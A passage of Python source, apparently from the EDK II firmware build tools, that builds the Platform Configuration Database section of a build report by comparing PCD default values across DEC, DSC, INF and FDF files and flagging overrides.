PcdList = self.ConditionalPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, [])
if Pcd not in PcdList:
PcdList.append(Pcd)
UnusedPcdList = []
if UnusedPcdFullList:
for Pcd in UnusedPcdFullList:
if Pcd.TokenSpaceGuidCName + '.' + Pcd.TokenCName in GlobalData.gConditionalPcds:
continue
UnusedPcdList.append(Pcd)
for Pcd in UnusedPcdList:
PcdList = self.UnusedPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, [])
if Pcd not in PcdList:
PcdList.append(Pcd)
for Module in Pa.Platform.Modules.values():
#
# Collect module override PCDs
#
for ModulePcd in Module.M.ModulePcdList + Module.M.LibraryPcdList:
TokenCName = ModulePcd.TokenCName
TokenSpaceGuid = ModulePcd.TokenSpaceGuidCName
ModuleDefault = ModulePcd.DefaultValue
ModulePath = os.path.basename(Module.M.MetaFile.File)
self.ModulePcdOverride.setdefault((TokenCName, TokenSpaceGuid), {})[ModulePath] = ModuleDefault
#
# Collect PCD DEC default value.
#
self.DecPcdDefault = {}
self._GuidDict = {}
for Pa in Wa.AutoGenObjectList:
for Package in Pa.PackageList:
Guids = Package.Guids
self._GuidDict.update(Guids)
for (TokenCName, TokenSpaceGuidCName, DecType) in Package.Pcds:
DecDefaultValue = Package.Pcds[TokenCName, TokenSpaceGuidCName, DecType].DefaultValue
self.DecPcdDefault.setdefault((TokenCName, TokenSpaceGuidCName, DecType), DecDefaultValue)
#
# Collect PCDs defined in DSC common section
#
self.DscPcdDefault = {}
for Pa in Wa.AutoGenObjectList:
for (TokenCName, TokenSpaceGuidCName) in Pa.Platform.Pcds:
DscDefaultValue = Pa.Platform.Pcds[(TokenCName, TokenSpaceGuidCName)].DscDefaultValue
if DscDefaultValue:
self.DscPcdDefault[(TokenCName, TokenSpaceGuidCName)] = DscDefaultValue
def GenerateReport(self, File, ModulePcdSet,ModuleGuid=None):
if not ModulePcdSet:
if self.ConditionalPcds:
self.GenerateReportDetail(File, ModulePcdSet, 1)
if self.UnusedPcds:
IsEmpty = True
for Token in self.UnusedPcds:
TokenDict = self.UnusedPcds[Token]
for Type in TokenDict:
if TokenDict[Type]:
IsEmpty = False
break
if not IsEmpty:
break
if not IsEmpty:
self.GenerateReportDetail(File, ModulePcdSet, 2)
self.GenerateReportDetail(File, ModulePcdSet,ModuleGuid = ModuleGuid)
##
# Generate report for PCD information
#
# This function generates report for separate module expression
# in a platform build.
#
# @param self The object pointer
# @param File The file object for report
# @param ModulePcdSet Set of all PCDs referenced by module or None for
# platform PCD report
# @param ReportySubType 0 means platform/module PCD report, 1 means Conditional
# directives section report, 2 means Unused Pcds section report
# @param DscOverridePcds Module DSC override PCDs set
#
def GenerateReportDetail(self, File, ModulePcdSet, ReportSubType = 0,ModuleGuid=None):
PcdDict = self.AllPcds
if ReportSubType == 1:
PcdDict = self.ConditionalPcds
elif ReportSubType == 2:
PcdDict = self.UnusedPcds
if not ModulePcdSet:
FileWrite(File, gSectionStart)
if ReportSubType == 1:
FileWrite(File, "Conditional Directives used by the build system")
elif ReportSubType == 2:
FileWrite(File, "PCDs not used by modules or in conditional directives")
else:
FileWrite(File, "Platform Configuration Database Report")
FileWrite(File, " *B - PCD override in the build option")
FileWrite(File, " *P - Platform scoped PCD override in DSC file")
FileWrite(File, " *F - Platform scoped PCD override in FDF file")
if not ReportSubType:
FileWrite(File, " *M - Module scoped PCD override")
FileWrite(File, gSectionSep)
else:
if not ReportSubType and ModulePcdSet:
#
# For module PCD sub-section
#
FileWrite(File, gSubSectionStart)
FileWrite(File, TAB_BRG_PCD)
FileWrite(File, gSubSectionSep)
AllPcdDict = {}
for Key in PcdDict:
AllPcdDict[Key] = {}
for Type in PcdDict[Key]:
for Pcd in PcdDict[Key][Type]:
AllPcdDict[Key][(Pcd.TokenCName, Type)] = Pcd
for Key in sorted(AllPcdDict):
#
# Group PCD by their token space GUID C Name
#
First = True
for PcdTokenCName, Type in sorted(AllPcdDict[Key]):
#
# Group PCD by their usage type
#
Pcd = AllPcdDict[Key][(PcdTokenCName, Type)]
TypeName, DecType = gPcdTypeMap.get(Type, ("", Type))
MixedPcdFlag = False
if GlobalData.MixedPcd:
for PcdKey in GlobalData.MixedPcd:
if (Pcd.TokenCName, Pcd.TokenSpaceGuidCName) in GlobalData.MixedPcd[PcdKey]:
PcdTokenCName = PcdKey[0]
MixedPcdFlag = True
if MixedPcdFlag and not ModulePcdSet:
continue
#
# Get PCD default value and their override relationship
#
DecDefaultValue = self.DecPcdDefault.get((Pcd.TokenCName, Pcd.TokenSpaceGuidCName, DecType))
DscDefaultValue = self.DscPcdDefault.get((Pcd.TokenCName, Pcd.TokenSpaceGuidCName))
DscDefaultValBak = DscDefaultValue
Field = ''
for (CName, Guid, Field) in self.FdfPcdSet:
if CName == PcdTokenCName and Guid == Key:
DscDefaultValue = self.FdfPcdSet[(CName, Guid, Field)]
break
if DscDefaultValue != DscDefaultValBak:
try:
DscDefaultValue = ValueExpressionEx(DscDefaultValue, Pcd.DatumType, self._GuidDict)(True)
except BadExpression as DscDefaultValue:
EdkLogger.error('BuildReport', FORMAT_INVALID, "PCD Value: %s, Type: %s" %(DscDefaultValue, Pcd.DatumType))
InfDefaultValue = None
PcdValue = DecDefaultValue
if DscDefaultValue:
PcdValue = DscDefaultValue
#The DefaultValue of StructurePcd already be the latest, no need to update.
if not self.IsStructurePcd(Pcd.TokenCName, Pcd.TokenSpaceGuidCName):
Pcd.DefaultValue = PcdValue
PcdComponentValue = None
if ModulePcdSet is not None:
if (Pcd.TokenCName, Pcd.TokenSpaceGuidCName, Type) not in ModulePcdSet:
continue
InfDefaultValue, PcdComponentValue = ModulePcdSet[Pcd.TokenCName, Pcd.TokenSpaceGuidCName, Type]
PcdValue = PcdComponentValue
#The DefaultValue of StructurePcd already be the latest, no need to update.
if not self.IsStructurePcd(Pcd.TokenCName, Pcd.TokenSpaceGuidCName):
Pcd.DefaultValue = PcdValue
if InfDefaultValue:
try:
InfDefaultValue = ValueExpressionEx(InfDefaultValue, Pcd.DatumType, self._GuidDict)(True)
except BadExpression as InfDefaultValue:
EdkLogger.error('BuildReport', FORMAT_INVALID, "PCD Value: %s, Type: %s" % (InfDefaultValue, Pcd.DatumType))
if InfDefaultValue == "":
InfDefaultValue = None
BuildOptionMatch = False
if GlobalData.BuildOptionPcd:
for pcd in GlobalData.BuildOptionPcd:
if (Pcd.TokenSpaceGuidCName, Pcd.TokenCName) == (pcd[0], pcd[1]):
if pcd[2]:
continue
PcdValue = pcd[3]
#The DefaultValue of StructurePcd already be the latest, no need to update.
if not self.IsStructurePcd(Pcd.TokenCName, Pcd.TokenSpaceGuidCName):
Pcd.DefaultValue = PcdValue
BuildOptionMatch = True
break
if First:
if ModulePcdSet is None:
FileWrite(File, "")
FileWrite(File, Key)
First = False
if Pcd.DatumType in TAB_PCD_NUMERIC_TYPES:
if PcdValue.startswith('0') and not PcdValue.lower().startswith('0x') and \
len(PcdValue) > 1 and PcdValue.lstrip('0'):
PcdValue = PcdValue.lstrip('0')
PcdValueNumber = int(PcdValue.strip(), 0)
if DecDefaultValue is None:
DecMatch = True
else:
if DecDefaultValue.startswith('0') and not DecDefaultValue.lower().startswith('0x') and \
len(DecDefaultValue) > 1 and DecDefaultValue.lstrip('0'):
DecDefaultValue = DecDefaultValue.lstrip('0')
DecDefaultValueNumber = int(DecDefaultValue.strip(), 0)
DecMatch = (DecDefaultValueNumber == PcdValueNumber)
if InfDefaultValue is None:
InfMatch = True
else:
if InfDefaultValue.startswith('0') and not InfDefaultValue.lower().startswith('0x') and \
len(InfDefaultValue) > 1 and InfDefaultValue.lstrip('0'):
InfDefaultValue = InfDefaultValue.lstrip('0')
InfDefaultValueNumber = int(InfDefaultValue.strip(), 0)
InfMatch = (InfDefaultValueNumber == PcdValueNumber)
if DscDefaultValue is None:
DscMatch = True
else:
if DscDefaultValue.startswith('0') and not DscDefaultValue.lower().startswith('0x') and \
len(DscDefaultValue) > 1 and DscDefaultValue.lstrip('0'):
DscDefaultValue = DscDefaultValue.lstrip('0')
DscDefaultValueNumber = int(DscDefaultValue.strip(), 0)
DscMatch = (DscDefaultValueNumber == PcdValueNumber)
else:
if DecDefaultValue is None:
DecMatch = True
else:
DecMatch = (DecDefaultValue.strip() == PcdValue.strip())
if InfDefaultValue is None:
InfMatch = True
else:
InfMatch = (InfDefaultValue.strip() == PcdValue.strip())
if DscDefaultValue is None:
DscMatch = True
else:
DscMatch = (DscDefaultValue.strip() == PcdValue.strip())
IsStructure = False
if self.IsStructurePcd(Pcd.TokenCName, Pcd.TokenSpaceGuidCName):
IsStructure = True
if TypeName in ('DYNVPD', 'DEXVPD'):
SkuInfoList = Pcd.SkuInfoList
Pcd = GlobalData.gStructurePcd[self.Arch][(Pcd.TokenCName, Pcd.TokenSpaceGuidCName)]
if ModulePcdSet and ModulePcdSet.get((Pcd.TokenCName, Pcd.TokenSpaceGuidCName, Type)):
InfDefaultValue, PcdComponentValue = ModulePcdSet[Pcd.TokenCName, Pcd.TokenSpaceGuidCName, Type]
DscDefaultValBak = Pcd.DefaultValue
Pcd.DefaultValue = PcdComponentValue
Pcd.DatumType = Pcd.StructName
if TypeName in ('DYNVPD', 'DEXVPD'):
Pcd.SkuInfoList = SkuInfoList
if Pcd.PcdValueFromComm or Pcd.PcdFieldValueFromComm:
BuildOptionMatch = True
DecMatch = False
elif Pcd.PcdValueFromFdf or Pcd.PcdFieldValueFromFdf:
DscDefaultValue = True
DscMatch = True
DecMatch = False
else:
if Pcd.Type in PCD_DYNAMIC_TYPE_SET | PCD_DYNAMIC_EX_TYPE_SET:
DscOverride = False
if Pcd.DefaultFromDSC:
DscOverride = True
else:
DictLen = 0
for item in Pcd.SkuOverrideValues:
DictLen += len(Pcd.SkuOverrideValues[item])
if not DictLen:
DscOverride = False
else:
if not Pcd.SkuInfoList:
OverrideValues = Pcd.SkuOverrideValues
if OverrideValues:
for Data in OverrideValues.values():
Struct = list(Data.values())
if Struct:
DscOverride = self.ParseStruct(Struct[0])
break
else:
SkuList = sorted(Pcd.SkuInfoList.keys())
for Sku in SkuList:
SkuInfo = Pcd.SkuInfoList[Sku]
if SkuInfo.DefaultStoreDict:
DefaultStoreList = sorted(SkuInfo.DefaultStoreDict.keys())
for DefaultStore in DefaultStoreList:
OverrideValues = Pcd.SkuOverrideValues.get(Sku)
if OverrideValues:
DscOverride = self.ParseStruct(OverrideValues[DefaultStore])
if DscOverride:
break
if DscOverride:
break
if DscOverride:
DscDefaultValue = True
DscMatch = True
DecMatch = False
else:
DecMatch = True
else:
if Pcd.DscRawValue or (ModuleGuid and ModuleGuid.replace("-","S") in Pcd.PcdValueFromComponents):
DscDefaultValue = True
DscMatch = True
DecMatch = False
else:
DscDefaultValue = False
DecMatch = True
#
# Report PCD item according to their override relationship
#
if Pcd.DatumType == 'BOOLEAN':
if DscDefaultValue:
DscDefaultValue = str(int(DscDefaultValue, 0))
if DecDefaultValue:
DecDefaultValue = str(int(DecDefaultValue, 0))
if InfDefaultValue:
InfDefaultValue = str(int(InfDefaultValue, 0))
if Pcd.DefaultValue:
Pcd.DefaultValue = str(int(Pcd.DefaultValue, 0))
if DecMatch:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, ' ')
elif InfDefaultValue and InfMatch:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, '*M')
elif BuildOptionMatch:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, '*B')
else:
if PcdComponentValue:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, PcdComponentValue, DecMatch, DecDefaultValue, '*M', ModuleGuid)
elif DscDefaultValue and DscMatch:
if (Pcd.TokenCName, Key, Field) in self.FdfPcdSet:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, '*F')
else:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, '*P')
if ModulePcdSet is None:
if IsStructure:
continue
if not TypeName in ('PATCH', 'FLAG', 'FIXED'):
continue
if not BuildOptionMatch:
ModuleOverride = self.ModulePcdOverride.get((Pcd.TokenCName, Pcd.TokenSpaceGuidCName), {})
for ModulePath in ModuleOverride:
ModuleDefault = ModuleOverride[ModulePath]
if Pcd.DatumType in TAB_PCD_NUMERIC_TYPES:
if ModuleDefault.startswith('0') and not ModuleDefault.lower().startswith('0x') and \
len(ModuleDefault) > 1 and ModuleDefault.lstrip('0'):
ModuleDefault = ModuleDefault.lstrip('0')
ModulePcdDefaultValueNumber = int(ModuleDefault.strip(), 0)
Match = (ModulePcdDefaultValueNumber == PcdValueNumber)
if Pcd.DatumType == 'BOOLEAN':
ModuleDefault = str(ModulePcdDefaultValueNumber)
else:
Match = (ModuleDefault.strip() == PcdValue.strip())
if Match:
continue
IsByteArray, ArrayList = ByteArrayForamt(ModuleDefault.strip())
if IsByteArray:
FileWrite(File, ' *M %-*s = %s' % (self.MaxLen + 15, ModulePath, '{'))
for Array in ArrayList:
FileWrite(File, Array)
else:
Value = ModuleDefault.strip()
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
FileWrite(File, ' *M %-*s = %s' % (self.MaxLen + 15, ModulePath, Value))
if ModulePcdSet is None:
FileWrite(File, gSectionEnd)
else:
if not ReportSubType and ModulePcdSet:
FileWrite(File, gSubSectionEnd)
def ParseStruct(self, struct):
HasDscOverride = False
if struct:
for _, Values in list(struct.items()):
for Key, value in Values.items():
if value[1] and value[1].endswith('.dsc'):
HasDscOverride = True
break
if HasDscOverride == True:
break
return HasDscOverride
def PrintPcdDefault(self, File, Pcd, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue):
if not DscMatch and DscDefaultValue is not None:
Value = DscDefaultValue.strip()
IsByteArray, ArrayList = ByteArrayForamt(Value)
if IsByteArray:
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'DSC DEFAULT', "{"))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'DSC DEFAULT', Value))
if not InfMatch and InfDefaultValue is not None:
Value = InfDefaultValue.strip()
IsByteArray, ArrayList = ByteArrayForamt(Value)
if IsByteArray:
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'INF DEFAULT', "{"))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'INF DEFAULT', Value))
if not DecMatch and DecDefaultValue is not None:
Value = DecDefaultValue.strip()
IsByteArray, ArrayList = ByteArrayForamt(Value)
if IsByteArray:
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'DEC DEFAULT', "{"))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'DEC DEFAULT', Value))
if IsStructure:
for filedvalues in Pcd.DefaultValues.values():
self.PrintStructureInfo(File, filedvalues)
if DecMatch and IsStructure:
for filedvalues in Pcd.DefaultValues.values():
self.PrintStructureInfo(File, filedvalues)
def PrintPcdValue(self, File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, Flag = ' ',ModuleGuid=None):
if not Pcd.SkuInfoList:
Value = Pcd.DefaultValue
IsByteArray, ArrayList = ByteArrayForamt(Value)
if IsByteArray:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '{'))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith('0') and not Value.lower().startswith('0x') and len(Value) > 1 and Value.lstrip('0'):
Value = Value.lstrip('0')
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', Value))
if IsStructure:
FiledOverrideFlag = False
if (Pcd.TokenCName,Pcd.TokenSpaceGuidCName) in GlobalData.gPcdSkuOverrides:
OverrideValues = GlobalData.gPcdSkuOverrides[(Pcd.TokenCName,Pcd.TokenSpaceGuidCName)]
else:
OverrideValues = Pcd.SkuOverrideValues
FieldOverrideValues = None
if OverrideValues:
for Data in OverrideValues.values():
Struct = list(Data.values())
if Struct:
FieldOverrideValues = Struct[0]
FiledOverrideFlag = True
break
if Pcd.PcdFiledValueFromDscComponent and ModuleGuid and ModuleGuid.replace("-","S") in Pcd.PcdFiledValueFromDscComponent:
FieldOverrideValues = Pcd.PcdFiledValueFromDscComponent[ModuleGuid.replace("-","S")]
if FieldOverrideValues:
OverrideFieldStruct = self.OverrideFieldValue(Pcd, FieldOverrideValues)
self.PrintStructureInfo(File, OverrideFieldStruct)
if not FiledOverrideFlag and (Pcd.PcdFieldValueFromComm or Pcd.PcdFieldValueFromFdf):
OverrideFieldStruct = self.OverrideFieldValue(Pcd, {})
self.PrintStructureInfo(File, OverrideFieldStruct)
self.PrintPcdDefault(File, Pcd, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue)
else:
FirstPrint = True
SkuList = sorted(Pcd.SkuInfoList.keys())
for Sku in SkuList:
SkuInfo = Pcd.SkuInfoList[Sku]
SkuIdName = SkuInfo.SkuIdName
if TypeName in ('DYNHII', 'DEXHII'):
if SkuInfo.DefaultStoreDict:
DefaultStoreList = sorted(SkuInfo.DefaultStoreDict.keys())
for DefaultStore in DefaultStoreList:
Value = SkuInfo.DefaultStoreDict[DefaultStore]
IsByteArray, ArrayList = ByteArrayForamt(Value)
if Pcd.DatumType == 'BOOLEAN':
Value = str(int(Value, 0))
if FirstPrint:
FirstPrint = False
if IsByteArray:
if self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '{'))
elif self.DefaultStoreSingle and not self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '{'))
elif not self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + DefaultStore + ')', '{'))
else:
FileWrite(File, ' %-*s : %6s %10s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '(' + DefaultStore + ')', '{'))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
if self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', Value))
elif self.DefaultStoreSingle and not self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', Value))
elif not self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + DefaultStore + ')', Value))
else:
FileWrite(File, ' %-*s : %6s %10s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '(' + DefaultStore + ')', Value))
else:
if IsByteArray:
if self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '{'))
elif self.DefaultStoreSingle and not self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '{'))
elif not self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + DefaultStore + ')', '{'))
else:
FileWrite(File, ' %-*s : %6s %10s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '(' + DefaultStore + ')', '{'))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
if self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', Value))
elif self.DefaultStoreSingle and not self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', Value))
elif not self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + DefaultStore + ')', Value))
else:
FileWrite(File, ' %-*s : %6s %10s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '(' + DefaultStore + ')', Value))
FileWrite(File, '%*s: %s: %s' % (self.MaxLen + 4, SkuInfo.VariableGuid, SkuInfo.VariableName, SkuInfo.VariableOffset))
if IsStructure:
OverrideValues = Pcd.SkuOverrideValues.get(Sku)
if OverrideValues:
OverrideFieldStruct = self.OverrideFieldValue(Pcd, OverrideValues[DefaultStore])
self.PrintStructureInfo(File, OverrideFieldStruct)
self.PrintPcdDefault(File, Pcd, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue)
else:
Value = SkuInfo.DefaultValue
IsByteArray, ArrayList = ByteArrayForamt(Value)
if Pcd.DatumType == 'BOOLEAN':
Value = str(int(Value, 0))
if FirstPrint:
FirstPrint = False
if IsByteArray:
if self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', "{"))
else:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', "{"))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
if self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', Value))
else:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', Value))
else:
if IsByteArray:
if self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', "{"))
else:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', "{"))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
if self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', Value))
else:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', Value))
if TypeName in ('DYNVPD', 'DEXVPD'):
FileWrite(File, '%*s' % (self.MaxLen + 4, SkuInfo.VpdOffset))
VPDPcdItem = (Pcd.TokenSpaceGuidCName + '.' + PcdTokenCName, SkuIdName, SkuInfo.VpdOffset, Pcd.MaxDatumSize, SkuInfo.DefaultValue)
if VPDPcdItem not in VPDPcdList:
PcdGuidList = self.UnusedPcds.get(Pcd.TokenSpaceGuidCName)
if PcdGuidList:
PcdList = PcdGuidList.get(Pcd.Type)
if not PcdList:
VPDPcdList.append(VPDPcdItem)
for VpdPcd in PcdList:
if PcdTokenCName == VpdPcd.TokenCName:
break
else:
VPDPcdList.append(VPDPcdItem)
if IsStructure:
FiledOverrideFlag = False
OverrideValues = Pcd.SkuOverrideValues.get(Sku)
if OverrideValues:
Keys = list(OverrideValues.keys())
OverrideFieldStruct = self.OverrideFieldValue(Pcd, OverrideValues[Keys[0]])
self.PrintStructureInfo(File, OverrideFieldStruct)
FiledOverrideFlag = True
if not FiledOverrideFlag and (Pcd.PcdFieldValueFromComm or Pcd.PcdFieldValueFromFdf):
OverrideFieldStruct = self.OverrideFieldValue(Pcd, {})
self.PrintStructureInfo(File, OverrideFieldStruct)
self.PrintPcdDefault(File, Pcd, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue)
def OverrideFieldValue(self, Pcd, OverrideStruct):
OverrideFieldStruct = collections.OrderedDict()
if OverrideStruct:
for _, Values in OverrideStruct.items():
for Key,value in Values.items():
if value[1] and value[1].endswith('.dsc'):
OverrideFieldStruct[Key] = value
if Pcd.PcdFieldValueFromFdf:
for Key, Values in Pcd.PcdFieldValueFromFdf.items():
if Key in OverrideFieldStruct and Values[0] == OverrideFieldStruct[Key][0]:
continue
OverrideFieldStruct[Key] = Values
if Pcd.PcdFieldValueFromComm:
for Key, Values in Pcd.PcdFieldValueFromComm.items():
if Key in OverrideFieldStruct and Values[0] == OverrideFieldStruct[Key][0]:
continue
OverrideFieldStruct[Key] = Values
return OverrideFieldStruct
def PrintStructureInfo(self, File, Struct):
for Key, Value in sorted(Struct.items(), key=lambda x: x[0]):
if Value[1] and 'build command options' in Value[1]:
FileWrite(File, ' *B %-*s = %s' % (self.MaxLen + 4, '.' + Key, Value[0]))
elif Value[1] and Value[1].endswith('.fdf'):
FileWrite(File, ' *F %-*s = %s' % (self.MaxLen + 4, '.' + Key, Value[0]))
else:
FileWrite(File, ' %-*s = %s' % (self.MaxLen + 4, '.' + Key, Value[0]))
def StrtoHex(self, value):
try:
value = hex(int(value))
return value
except:
if value.startswith("L\"") and value.endswith("\""):
valuelist = []
for ch in value[2:-1]:
valuelist.append(hex(ord(ch)))
valuelist.append('0x00')
return valuelist
elif value.startswith("\"") and value.endswith("\""):
return hex(ord(value[1:-1]))
elif value.startswith("{") and value.endswith("}"):
valuelist = []
if ',' not in value:
return value[1:-1]
for ch in value[1:-1].split(','):
ch = ch.strip()
if ch.startswith('0x') or ch.startswith('0X'):
valuelist.append(ch)
continue
try:
valuelist.append(hex(int(ch.strip())))
except:
pass
return valuelist
else:
return value
def IsStructurePcd(self, PcdToken, PcdTokenSpaceGuid):
if GlobalData.gStructurePcd and (self.Arch in GlobalData.gStructurePcd) and ((PcdToken, PcdTokenSpaceGuid) in GlobalData.gStructurePcd[self.Arch]):
return True
else:
return False
##
# Reports platform and module Prediction information
#
# This class reports the platform execution order prediction section and
# module load fixed address prediction subsection in the build report file.
#
class PredictionReport(object):
##
# Constructor function for class PredictionReport
#
# This constructor function generates PredictionReport object for the platform.
#
# @param self: The object pointer
